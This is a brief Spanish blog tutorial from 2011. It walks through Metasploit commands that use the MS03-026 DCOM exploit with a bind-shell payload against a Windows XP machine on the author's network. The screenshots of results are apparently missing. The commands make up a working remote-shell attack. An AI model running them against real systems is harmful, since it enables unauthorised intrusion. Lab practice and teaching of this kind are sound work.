miércoles, 30 de noviembre de 2011

Exploit DCOM en Windows XP

Bueno, en esta entrada vamos a usar Metasploit contra una máquina que esta en mi red y tiene Windows XP.

Primero, usamos nmap y vemos que puertos tiene abiertos.




Vemos que tiene el puerto 135, y Windows XP, así que el exploit a elegir será este: exploit/windows/dcerpc/ms03_026_dcom

Abrimos metasploit en la consola

$msfconsole
$use exploit/windows/dcerpc/ms03_026_dcom
$set TARGET 0
$show payloads
(Aquí elegimos el que queramos, yo he cogido generic/shell_bind_tcp)
$set PAYLOAD generic/shell_bind_tcp
$set RHOST 192.168.1.12
(Máquina remota a la que vamos a meter el exploit)
$exploit



Resultado:

No hay comentarios:

Publicar un comentario